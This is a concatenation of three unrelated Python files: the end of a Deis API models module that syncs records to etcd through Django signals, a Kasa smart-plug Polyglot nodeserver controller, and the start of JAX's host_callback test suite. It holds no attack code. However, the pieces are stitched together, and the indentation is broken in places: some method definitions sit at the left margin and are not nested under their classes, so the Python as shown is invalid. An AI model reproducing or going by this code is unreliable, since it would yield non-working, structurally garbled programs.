    _etcd_client.write('/deis/certs/{}/cert'.format(cert), cert.certificate)
    _etcd_client.write('/deis/certs/{}/key'.format(cert), cert.key)
def _etcd_purge_cert(**kwargs):
    """post_delete hook: remove a certificate's etcd directory (no-op if absent)."""
    cert = kwargs['instance']
    try:
        _etcd_client.delete('/deis/certs/{}'.format(cert),
                            prevExist=True, dir=True, recursive=True)
    except KeyError:
        pass
def _etcd_publish_config(**kwargs):
    """post_save hook: replace the app's /deis/config tree with current values.

    The whole directory is purged first because `deis config:unset` removes
    a value from the new Config object but leaves the old etcd entry behind.
    """
    config = kwargs['instance']
    try:
        _etcd_client.delete('/deis/config/{}'.format(config.app),
                            prevExist=True, dir=True, recursive=True)
    except KeyError:
        pass
    # iteritems/unicode: this module targets Python 2
    for k, v in config.values.iteritems():
        key_path = '/deis/config/{}/{}'.format(
            config.app, unicode(k).encode('utf-8').lower())
        _etcd_client.write(key_path, unicode(v).encode('utf-8'))
def _etcd_purge_config(**kwargs):
    """post_delete hook: drop the app's /deis/config tree (no-op if absent)."""
    config = kwargs['instance']
    try:
        _etcd_client.delete('/deis/config/{}'.format(config.app),
                            prevExist=True, dir=True, recursive=True)
    except KeyError:
        pass
def _etcd_publish_domains(**kwargs):
    """post_save hook: map the domain name to its app under /deis/domains."""
    domain = kwargs['instance']
    _etcd_client.write('/deis/domains/{}'.format(domain), domain.app)
def _etcd_purge_domains(**kwargs):
    """post_delete hook: remove the domain mapping from etcd (no-op if absent)."""
    domain = kwargs['instance']
    try:
        _etcd_client.delete('/deis/domains/{}'.format(domain),
                            prevExist=True, dir=True, recursive=True)
    except KeyError:
        pass
# Log significant app-related events
# (dispatch_uid keeps each handler from being registered twice on re-import)
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_save.connect(_log_cert_added, sender=Certificate, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_cert_removed, sender=Certificate, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
    """Create a DRF auth Token for every newly created user."""
    if not created:
        return
    Token.objects.create(user=instance)
# etcd synchronization is optional: if no client is configured, none of the
# etcd signal handlers below are registered.
_etcd_client = get_etcd_client()


if _etcd_client:
    post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
    post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
    post_save.connect(_etcd_publish_app, sender=App, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
    post_save.connect(_etcd_publish_cert, sender=Certificate, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_cert, sender=Certificate, dispatch_uid='api.models')
    post_save.connect(_etcd_publish_config, sender=Config, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_config, sender=Config, dispatch_uid='api.models')
|
Controller.py |
from udi_interface import Node,LOGGER,Custom,LOG_HANDLER
import logging,re,json,sys,asyncio
from threading import Thread,Event
from node_funcs import get_valid_node_name,get_valid_node_address
#sys.path.insert(0,"pyHS100")
#from pyHS100 import Discover
from kasa import Discover
from nodes import SmartStripPlugNode
from nodes import SmartStripNode
from nodes import SmartPlugNode
from nodes import SmartDimmerNode
from nodes import SmartBulbNode
from nodes import SmartLightStripNode
#logging.getLogger('pyHS100').setLevel(logging.DEBUG)
# We need an event loop for python-kasa since we run in a
# thread which doesn't have a loop
mainloop = asyncio.get_event_loop()
class Controller(Node):
def __init__(self, poly, primary, address, name):
    """Controller node: owns discovery, poll worker threads, and child nodes."""
    super(Controller, self).__init__(poly, primary, address, name)
    self.poll = False
    self.ready = False
    # heartbeat toggle: 0 -> send DON next, 1 -> send DOF next
    self.hb = 0
    # stripped-MAC -> node object for every device we have added
    self.nodes_by_mac = {}
    self.discover_done = False
    # For the short/long poll threads, we run them in threads so the main
    # process is always available for controlling devices
    # (events start as False and become threading.Event on first poll)
    self.short_event = False
    self.in_short_poll = False
    self.long_event = False
    self.in_long_poll = False
    self.Notices = Custom(self.poly, 'notices')
    self.Parameters = Custom(self.poly, 'customparams')
    self.poly.subscribe(self.poly.START, self.handler_start, address)
    self.poly.subscribe(self.poly.POLL, self.handler_poll)
    self.poly.subscribe(self.poly.LOGLEVEL, self.handler_log_level)
    self.poly.subscribe(self.poly.CONFIGDONE, self.handler_config_done)
    self.poly.subscribe(self.poly.DISCOVER, self.discover_new)
    self.poly.ready()
    self.poly.addNode(self, conn_status='ST')
def handler_start(self):
    """Polyglot START handler: start the asyncio loop thread, then discover.

    NOTE(review): returns False on discover failure and implicitly None on
    success — confirm no caller relies on the return value.
    """
    LOGGER.info(f"Started Kasa PG3 NodeServer {self.poly.serverdata['version']}")
    self.Notices.clear()
    self.mainloop = mainloop
    asyncio.set_event_loop(mainloop)
    # run the shared asyncio loop forever in its own thread; device I/O is
    # later scheduled onto it with run_coroutine_threadsafe
    self.connect_thread = Thread(target=mainloop.run_forever)
    self.connect_thread.start()
    self.setDriver('ST', 1)
    self.heartbeat()
    self.check_params()
    try:
        self.discover()
    except:
        LOGGER.error(f'discover failed', exc_info=True)
        return False
    self.ready = True
    LOGGER.info(f'exit {self.name}')
# For things we only do after the configuration is loaded...
def handler_config_done(self):
    """CONFIGDONE handler: register the extra DEBUG_MODULES log level."""
    LOGGER.debug('enter')
    self.poly.addLogLevel('DEBUG_MODULES', 9, 'Debug + Modules')
    LOGGER.debug('exit')
def handler_poll(self, polltype):
    """Dispatch Polyglot POLL events to the matching poll routine."""
    dispatch = {'longPoll': self.longPoll, 'shortPoll': self.shortPoll}
    handler = dispatch.get(polltype)
    if handler is not None:
        handler()
def shortPoll(self):
    """Kick the background short-poll worker (created lazily on first call).

    Skips when discovery hasn't finished or a previous short poll is still
    running (in_short_poll is cleared by _shortPoll_a).
    """
    if not self.discover_done:
        LOGGER.info('waiting for discover to complete')
        return
    if self.in_short_poll:
        LOGGER.info('Already running')
        return
    self.in_short_poll = True
    if self.short_event is False:
        # first call: create the wake-up event and the worker thread
        LOGGER.debug('Setting up Thread')
        self.short_event = Event()
        self.short_thread = Thread(name='shortPoll',target=self._shortPoll)
        self.short_thread.daemon = True
        LOGGER.debug('Starting Thread')
        st = self.short_thread.start()  # Thread.start() returns None
        LOGGER.debug(f'Thread start st={st}')
    # Tell the thread to run
    LOGGER.debug(f'thread={self.short_thread} event={self.short_event}')
    if self.short_event is not None:
        LOGGER.debug('calling event.set')
        self.short_event.set()
    else:
        LOGGER.error(f'event is gone? thread={self.short_thread} event={self.short_event}')
def _shortPoll(self):
    """Worker thread loop: wait for the event, schedule the async short poll."""
    while (True):
        self.short_event.wait()
        LOGGER.debug('enter')
        # hand the actual polling work to the asyncio loop thread
        asyncio.run_coroutine_threadsafe(self._shortPoll_a(), self.mainloop)
        LOGGER.debug('exit')
        self.short_event.clear()
async def _shortPoll_a(self):
    """Async short poll: call shortPoll() on every pollable child node."""
    LOGGER.debug('enter')
    for node_address in self.poly.getNodes():
        node = self.poly.getNode(node_address)
        LOGGER.debug(f'node.address={node.address} node.name={node.name} ')
        if node.poll:
            await node.shortPoll()
    # allow the next shortPoll to start
    self.in_short_poll = False
    LOGGER.debug('exit')
def longPoll(self):
    """Kick the background long-poll worker (heartbeat + device refresh).

    The real work runs in a dedicated thread, created lazily on the first
    call, and is woken via an Event so the main process stays responsive.
    Re-entry is guarded by in_long_poll, which _longPoll_a clears.
    """
    if not self.discover_done:
        LOGGER.info('waiting for discover to complete')
        return
    if self.in_long_poll:
        LOGGER.info('Already running')
        return
    self.in_long_poll = True
    self.heartbeat()
    # (removed a duplicated discover_done check here: it was unreachable
    # after the check above, and returning at that point would have left
    # in_long_poll stuck at True)
    if self.long_event is False:
        # first call: create the wake-up event and the worker thread
        LOGGER.debug('Setting up Thread')
        self.long_event = Event()
        self.long_thread = Thread(name='longPoll',target=self._longPoll)
        self.long_thread.daemon = True
        LOGGER.debug('Starting Thread')
        st = self.long_thread.start()  # Thread.start() returns None
        # BUG FIX: was a plain string, so '{st}' was logged literally
        LOGGER.debug(f'Thread start st={st}')
    # Tell the thread to run
    LOGGER.debug(f'thread={self.long_thread} event={self.long_event}')
    if self.long_event is not None:
        LOGGER.debug('calling event.set')
        self.long_event.set()
    else:
        LOGGER.error(f'event is gone? thread={self.long_thread} event={self.long_event}')
def _longPoll(self):
    """Worker thread loop: wait for the event, schedule the async long poll."""
    while (True):
        self.long_event.wait()
        LOGGER.debug('enter')
        # hand the actual polling work to the asyncio loop thread
        asyncio.run_coroutine_threadsafe(self._longPoll_a(), self.mainloop)
        self.long_event.clear()
        LOGGER.debug('exit')
async def _longPoll_a(self):
    """Async long poll: refresh connected nodes; rediscover if any are down."""
    LOGGER.debug('enter')
    all_connected = True
    for node_address in self.poly.getNodes():
        node = self.poly.getNode(node_address)
        if node.poll:
            try:
                if node.is_connected():
                    await node.longPoll()
                else:
                    LOGGER.warning(f"Known device not responding {node.address} '{node.name}'")
                    all_connected = False
            except:
                pass # in case node doesn't have a longPoll method
    if not all_connected:
        LOGGER.warning("Not all devices are connected, running discover to check for them")
        await self._discover_new_a()
    # allow the next longPoll to start
    self.in_long_poll = False
    LOGGER.debug('exit')
def query(self):
    """QUERY handler: refresh status, report all drivers, re-check params."""
    self.setDriver('ST', 1)
    self.reportDrivers()
    self.check_params()
def heartbeat(self):
    """Send alternating DON/DOF heartbeat commands, toggling self.hb."""
    # BUG FIX: was a plain string, so '{self.hb}' was logged literally
    LOGGER.debug(f'hb={self.hb}')
    if self.hb == 0:
        self.reportCmd("DON", 2)
        self.hb = 1
    else:
        self.reportCmd("DOF", 2)
        self.hb = 0
def discover(self):
    """Blocking initial discovery: run _discover on the asyncio loop and wait."""
    # stripped-MAC -> True for devices seen during this discovery pass
    self.devm = {}
    LOGGER.info(f"enter: {self.poly.network_interface['broadcast']} timout=10 discovery_packets=10 mainloop={self.mainloop}")
    future = asyncio.run_coroutine_threadsafe(self._discover(), self.mainloop)
    # block until discovery completes; polling is gated on discover_done
    res = future.result()
    LOGGER.debug(f'result={res}')
    self.discover_done = True
    LOGGER.info("exit")
async def discover_add_device(self,dev):
    """Discovery callback: add a node for a found device and record its MAC."""
    LOGGER.debug(f"enter: {dev}")
    LOGGER.info(f"Got Device\n\tAlias:{dev.alias}\n\tModel:{dev.model}\n\tMac:{dev.mac}\n\tHost:{dev.host}")
    self.add_node(dev=dev)
    # Add to our list of added devices
    self.devm[self.smac(dev.mac)] = True
    LOGGER.debug(f"exit: {dev}")
async def _discover(self):
    """Broadcast discovery, then re-add saved devices that didn't answer."""
    LOGGER.debug('enter')
    await Discover.discover(timeout=10,discovery_packets=10,target=self.poly.network_interface['broadcast'],on_discovered=self.discover_add_device)
    # make sure all we know about are added in case they didn't respond this time.
    LOGGER.info(f"Discover.discover done: checking for previously known devices")
    for mac in self.Parameters:
        LOGGER.debug(f'checking mac={mac}')
        if self.smac(mac) in self.devm:
            LOGGER.debug(f'already added mac={mac}')
        else:
            # fall back to the saved JSON cfg for this MAC
            cfg = self.get_device_cfg(mac)
            LOGGER.debug(f'cfg={cfg}')
            if cfg is not None:
                LOGGER.warning(f"Adding previously known device that didn't respond to discover: {cfg}")
                self.add_node(cfg=cfg)
    LOGGER.debug('exit')
    return True
async def discover_new_add_device(self,dev):
    """Re-discovery callback: update/reconnect known devices, add new ones."""
    LOGGER.debug(f'enter: dev={dev}')
    # Known Device?
    await dev.update()
    LOGGER.debug(f'dev={dev}')
    smac = self.smac(dev.mac)
    if smac in self.nodes_by_mac:
        # Make sure the host matches
        node = self.nodes_by_mac[smac]
        if dev.host != node.host:
            # device got a new IP (e.g. DHCP lease change): repoint and reconnect
            LOGGER.warning(f"Updating '{node.name}' host from {node.host} to {dev.host}")
            node.host = dev.host
            node.connect()
        else:
            LOGGER.info(f"Connected:{node.is_connected()} '{node.name}'")
            if not node.is_connected():
                # Previously connected node
                LOGGER.warning(f"Connected:{node.is_connected()} '{node.name}' host is {node.host} same as {dev.host}")
                await node.connect_a()
    else:
        LOGGER.warning(f'Found a new device, adding it... {dev.alias}')
        self.add_node(dev=dev)
def discover_new(self):
    """DISCOVER handler: blocking re-discovery for new or moved devices."""
    LOGGER.info('enter')
    if not self.ready:
        # handler_start hasn't finished; nothing is set up to add nodes yet
        LOGGER.error("Node is not yet ready")
        return False
    future = asyncio.run_coroutine_threadsafe(self._discover_new_a(), self.mainloop)
    res = future.result()
    LOGGER.debug(f'result={res}')
    LOGGER.info("exit")
async def _discover_new_a(self):
    """Broadcast discovery routed through discover_new_add_device."""
    await Discover.discover(target=self.poly.network_interface['broadcast'],on_discovered=self.discover_new_add_device)
# Add a node based on dev returned from discover or the stored config.
def add_node(self, parent=None, address_suffix_num=None, dev=None, cfg=None):
    """Create the proper node type from a kasa device or a saved cfg dict.

    Exactly one of dev/cfg should be provided.  Returns the added node,
    or False on an unknown device type or bad arguments.
    NOTE(review): branch order matters below (is_bulb/is_strip checked
    before is_plug) — confirm against python-kasa's device-type flags
    before reordering.
    """
    LOGGER.debug(f'enter: dev={dev}')
    if parent is None:
        parent = self
    if dev is not None:
        mac = dev.mac
        if dev.is_bulb:
            type = 'SmartBulb'
            name = dev.alias
        elif dev.is_strip:
            type = 'SmartStrip'
            # SmartStrip doesn't have an alias so use the mac
            name = 'SmartStrip {}'.format(mac)
        elif dev.is_plug:
            type = 'SmartPlug'
            name = dev.alias
        elif dev.is_strip_socket:
            type = 'SmartStripPlug'
            name = dev.alias
        elif dev.is_light_strip:
            type = 'SmartLightStrip'
            name = dev.alias
        elif dev.is_dimmable:
            type = 'SmartDimmer'
            name = dev.alias
        else:
            LOGGER.error(f"What is this? {dev}")
            return False
        # strip sockets get a 2-digit suffix appended to the strip's mac
        if address_suffix_num is None:
            naddress = mac
        else:
            naddress = "{}{:02d}".format(mac,address_suffix_num)
        LOGGER.info(f"Got a {type}")
        cfg = { "type": type, "name": get_valid_node_name(name), "host": dev.host, "mac": mac, "model": dev.model, "address": get_valid_node_address(naddress)}
    elif cfg is None:
        LOGGER.error(f"INTERNAL ERROR: dev={dev} and cfg={cfg}")
        return False
    LOGGER.info(f"adding {cfg['type']} '{cfg['name']}' {cfg['address']}")
    #
    # Add Based on device type. SmartStrip is a unique type, all others
    # are handled by SmartDevice
    #
    # LOGGER.error(f"alb:controller.py:{cfg['type']}")
    if cfg['type'] == 'SmartPlug':
        self.poly.addNode(SmartPlugNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
    elif cfg['type'] == 'SmartStrip':
        self.poly.addNode(SmartStripNode(self, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
    elif cfg['type'] == 'SmartStripPlug':
        self.poly.addNode(SmartStripPlugNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
    elif cfg['type'] == 'SmartDimmer':
        self.poly.addNode(SmartDimmerNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
    elif cfg['type'] == 'SmartBulb':
        self.poly.addNode(SmartBulbNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
    elif cfg['type'] == 'SmartLightStrip':
        self.poly.addNode(SmartLightStripNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
    else:
        LOGGER.error(f"Device type not yet supported: {cfg['type']}")
        return False
    # We always add it to update the host if necessary
    node = self.poly.getNode(cfg['address'])
    if node is None:
        LOGGER.error(f"Unable to retrieve node address {cfg['address']} for {type} returned {node}")
    else:
        self.nodes_by_mac[self.smac(cfg['mac'])] = node
    LOGGER.debug(f'exit: dev={dev}')
    return node
def smac(self, mac):
    """Return the MAC address with all ':' separators stripped."""
    return mac.replace(':', '')
def exist_device_param(self, mac):
    """Return True when a saved custom param exists for this MAC."""
    return self.smac(mac) in self.polyConfig['customParams']
def save_cfg(self, cfg):
    """Persist a device cfg dict as JSON, keyed by its stripped MAC."""
    LOGGER.debug(f'Saving config: {cfg}')
    self.Parameters[self.smac(cfg['mac'])] = json.dumps(cfg)
def get_device_cfg(self, mac):
    """Load the stored JSON cfg for a MAC; return None when parsing fails."""
    cfg = self.polyConfig['customParams'][self.smac(mac)]
    try:
        return json.loads(cfg)
    except:
        err = sys.exc_info()[0]
        LOGGER.error(f'failed to parse cfg={cfg} Error: {err}')
        return None
def handler_log_level(self, level):
    """LOGLEVEL handler: sync python logging with the level picked in the UI."""
    LOGGER.info(f'enter: level={level}')
    debug_mode = level['level'] < 10
    if debug_mode:
        LOGGER.info("Setting basic config to DEBUG...")
    else:
        LOGGER.info("Setting basic config to WARNING...")
    LOG_HANDLER.set_basic_config(True, logging.DEBUG if debug_mode else logging.WARNING)
    LOGGER.info(f'exit: level={level}')
def delete(self):
    """Called by Polyglot when the nodeserver is removed."""
    LOGGER.info("Oh No I'm being deleted. Nooooooooooooooooooooooooooooooooooooooooo.")
def check_params(self):
    # Placeholder: no custom parameters are validated for this nodeserver yet.
    pass
def update_profile(self):
    """Push the node profile files to the ISY; return the update status."""
    LOGGER.info('start')
    return self.poly.updateProfile()
def _cmd_query_all(self, command):
    """QUERY_ALL command: query this controller and every pollable child."""
    self.query()
    for addr in self.poly.getNodes():
        child = self.poly.getNode(addr)
        if child.poll:
            child.query()
def _cmd_update_profile(self, command):
    """UPDATE_PROFILE command handler."""
    self.update_profile()
def _cmd_discover(self, cmd):
    """DISCOVER command handler: look for new or moved devices."""
    self.discover_new()
id = 'KasaController'
commands = {
'QUERY': query,
'QUERY_ALL': _cmd_query_all,
'DISCOVER': _cmd_discover,
'UPDATE_PROFILE': _cmd_update_profile,
}
drivers = [
{'driver': 'ST', 'value': 1, 'uom': 25} ,
] |
host_callback_test.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
import unittest
from unittest import skip, SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import ad_checkpoint
from jax import core
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax.experimental import PartitionSpec as P
from jax.experimental import maps
from jax.experimental import pjit
from jax import lax
from jax import numpy as jnp
from jax._src import test_util as jtu
from jax import tree_util
from jax._src.lib import xla_client
from jax._src.lib import xla_bridge
xops = xla_client.ops
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self._test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self._test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r".*device: (\S+)", s)
if m:
by_device.append((m.group(1), []))
assert by_device, f"output does not include 'device:': {self._output}"
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
  """Function used for several `id_tap` tests.

  Taps a * 2 and y * 3 to `testing_stream`; numerically equal to
  `fun1_equiv` (returns (a * 2) ** 2).
  """
  y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
  y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
  return y ** 2  # Some computation to make the gradient interesting
def fun1_equiv(a):
  """Numerical equivalent of `fun1`, without any host callbacks."""
  doubled = a * 2.
  return doubled ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
  """Tap `arg` to `testing_stream` via `id_print` when `do_print` is set."""
  if not do_print:
    return arg
  return hcb.id_print(arg, what=what, output_stream=testing_stream,
                      tap_with_device=tap_with_device)
def local_devices():
  """Return at most the first two local devices (tests assume <= 2)."""
  devices = jax.local_devices()
  return devices[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
                                 expected: str, what: str):
  """A variant that preprocesses the string to eliminate non-determinism in
  floating point values, and several uninteresting id_tap primitive params.
  """
  # Sometimes we get floating points in the output; we round them
  def repl_floats(match_group):
    matched = match_group.group(0)
    if matched == ".": return matched
    x = np.around(float(matched), decimals=2)
    return f"{x:.2f}"
  what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
  # strip primitive params whose values vary run-to-run
  what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
  what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
  what = re.sub(r"bwd=[^\]\n]*", "", what)
  what = re.sub(r"out_trees=[^\]\n]*", "", what)
  what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
  what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
  # Empty lines
  what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
  def repl_func(match_group):
    # normalize function-valued params: keep "_print" recognizable, elide others
    matched = match_group.group(3)
    if "function _print_consumer" in matched:
      return match_group.group(1) + "=_print"
    else:
      return match_group.group(1) + "=..."
  what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
  tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
  """Point XLA_FLAGS at a fresh /tmp/xla_dump directory for HLO dumps."""
  import shutil
  dump_dir = "/tmp/xla_dump"
  existing_flags = os.getenv("XLA_FLAGS", "")
  os.environ["XLA_FLAGS"] = f"{existing_flags} --xla_dump_to={dump_dir}"
  if os.path.isdir(dump_dir):
    logging.warning("Deleting old XLA dump directory %s", dump_dir)
    shutil.rmtree(dump_dir)
  logging.warning("Setting XLA dump directory %s", dump_dir)
  # Clear any cached backends so new CPU backend will pick up the env var.
  xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
  """Compile `fun` for CPU and print its optimized HLO, metadata stripped."""
  backend = xla_bridge.get_backend()
  c = jax.xla_computation(fun, backend='cpu')(*args)
  print(re.sub(r", metadata.*", "",
               backend.compile(c).hlo_modules()[0].to_string()))
def helper_log_ir(name,
                  f_jax,
                  *args,
                  num_partitions=None,
                  strip_metadata=False):
  """Print the jaxpr, unoptimized HLO and optimized HLO of `f_jax(*args)`.

  Args:
    name: label used in the printed headers.
    f_jax: the function to inspect.
    *args: arguments used to trace/compile the function.
    num_partitions: if set, compile with SPMD partitioning over this many
      partitions (single replica).
    strip_metadata: if True, remove `, metadata...` noise from the optimized
      HLO before printing.
  """
  print(f"Jaxpr[{name}]: {jax.make_jaxpr(f_jax)(*args)}")
  jax_comp = jax.xla_computation(f_jax, backend='cpu')(*args)
  print(f"HLO[{name}]: {jax_comp.as_hlo_text()}")
  backend = xla_bridge.get_backend()
  compile_options = None
  if num_partitions is not None:
    num_replicas = 1
    devices = np.array(jax.devices()[:num_partitions * num_replicas])
    devices = np.reshape(devices, (-1, num_partitions))
    compile_options = xla_bridge.get_compile_options(
        num_replicas=num_replicas,
        num_partitions=num_partitions,
        device_assignment=devices,
        use_spmd_partitioning=num_partitions > 1,
    )
  jax_optimized_hlo = backend.compile(
      jax_comp, compile_options).hlo_modules()[0].to_string()
  if strip_metadata:
    jax_optimized_hlo = re.sub(r", metadata.*", "", jax_optimized_hlo)
  print(f"Optimized HLO[{name}] for "
        f"platform {backend.platform}: {jax_optimized_hlo}")
prev_xla_flags = None
def setUpModule():
  """Force 2 CPU devices for the whole module's tests."""
  global prev_xla_flags
  # This will control the CPU devices. On TPU we always have 2 devices
  prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
  """Undo setUpModule's device-count override."""
  prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
                                 expected_2CPUs: str):
  """Check that the multi-device output is equal to the expected.

  The tests run with 2 devices if available, otherwise 1 device.
  We adjust the expected output here for 1 device.

  Args:
    expected_2CPUs: the expected output for 2 CPUs. If there is only
      one device, this is trimmed to the first device. If the current
      device_under_test is not a CPU, then we change the names
  """
  expected = expected_2CPUs
  if len(local_devices()) == 1:
    # Keep only the portion belonging to the first device.
    cut_at = expected.find('device: cpu:1')
    if cut_at >= 0:
      expected = expected[:cut_at]
  # Substitute the actual device names for the generic "cpu:<n>" tags.
  def replace_device_name(m) -> str:
    return str(local_devices()[int(m.group(1))])
  expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
  return assertMultiLineStrippedEqual(
      tst, expected, testing_stream.output_sorted_by_device)
class HostCallbackTapTest(jtu.JaxTestCase):
  def setUp(self):
    super().setUp()
    if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
      raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
    # Start each test with an empty tap-output stream, tagged with the test
    # name so stray output can be attributed.
    testing_stream.reset()
    testing_stream._test_method_name = self._testMethodName
    # Remember XLA_FLAGS so tearDown can restore them if a test changes them.
    self.old_flags = os.getenv("XLA_FLAGS", "")
  def tearDown(self) -> None:
    # Restore XLA_FLAGS if a test modified them; clearing the backend cache
    # makes the restored flags take effect for subsequent tests.
    if os.getenv("XLA_FLAGS") != self.old_flags:
      os.environ["XLA_FLAGS"] = self.old_flags
      xla_bridge.get_backend.cache_clear()
    # Drain all outstanding tap callbacks before the test finishes.
    hcb.barrier_wait("HostCallbackTapTest.tearDown")
    super().tearDown()
  def test_tap_eval(self):
    """Taps from an un-jitted (eager) computation reach the stream."""
    self.assertAllClose((5. * 2.) ** 2, fun1(5.))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        what: a * 2
        10.00
        what: y * 3
        30.00""", testing_stream.output)
  def test_tap_with_tuple_results(self):
    """id_print of a tuple passes both elements through unchanged."""
    def func2(x):
      x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
      return x1 + y1
    self.assertEqual(3. * (2. + 3.), func2(3.))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        ( 6.00 9.00 )""", testing_stream.output)
  def test_tap_with_dict_results(self):
    """id_print of a dict passes the values through unchanged."""
    def func2(x):
      res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
      return res["a"] + res["b"]
    self.assertEqual(3. * (2. + 3.), func2(3.))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        { a=6.00 b=9.00 }""", testing_stream.output)
  def test_tap_with_result(self):
    """With result=, id_print returns `result` while tapping its arguments."""
    def func2(x):
      x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
                        output_stream=testing_stream)
      return x1
    self.assertEqual(3. * 4., func2(3.))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        ( 6.00 9.00 )""", testing_stream.output)
  def test_tap_with_result_no_arg(self):
    """id_tap with a None payload still invokes the tap function."""
    def tap_func(arg, transforms):
      testing_stream.write(f"called tap_func with {arg}")
    def func2(x):
      x1 = hcb.id_tap(tap_func, None, result=x)
      return x1
    self.assertEqual(3., func2(3.))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, "called tap_func with None",
                                 testing_stream.output)
  def test_tap_result_unused(self):
    """The tap fires even when id_tap's return value is discarded."""
    def tap_func(arg, transforms):
      testing_stream.write(f"called tap_func with {arg}")
    def func2(x):
      hcb.id_tap(tap_func, None)
      return x
    self.assertEqual(3., func2(3.))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, "called tap_func with None",
                                 testing_stream.output)
  def test_tap_with_device(self):
    """tap_with_device=True prefixes the output with the originating device."""
    def func2(x):
      x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
                        output_stream=testing_stream,
                        tap_with_device=True)
      return x1
    self.assertEqual(3. * 4., func2(3.))
    hcb.barrier_wait()
    assertMultiDeviceOutputEqual(self, """
        device: cpu:0
        ( 6.00 9.00 )""")
  def test_tap_eval_exception(self):
    """An exception in a tap surfaces as CallbackException; earlier taps
    are still delivered."""
    if not FLAGS.jax_host_callback_outfeed:
      raise SkipTest("TODO: implement error handling for customcall")
    # Simulate a tap error
    def tap_err(*args, **kwargs):
      raise ValueError("Some user message")
    def func(x):
      x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
      x2 = hcb.id_tap(tap_err, x1 + 1)
      x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
      return x3
    with self.assertRaisesRegex(
        hcb.CallbackException,
        re.compile("There were exceptions during callback processing. Last one was:.*"
                   "ValueError: Some user message", re.DOTALL)):
      func(0)
      hcb.barrier_wait()
    # We should have received everything before the error
    assertMultiLineStrippedEqual(self, """
        what: x1
        1
        what: x3
        3""", testing_stream.output)
  def test_tap_empty(self):
    """Tap empty arrays."""
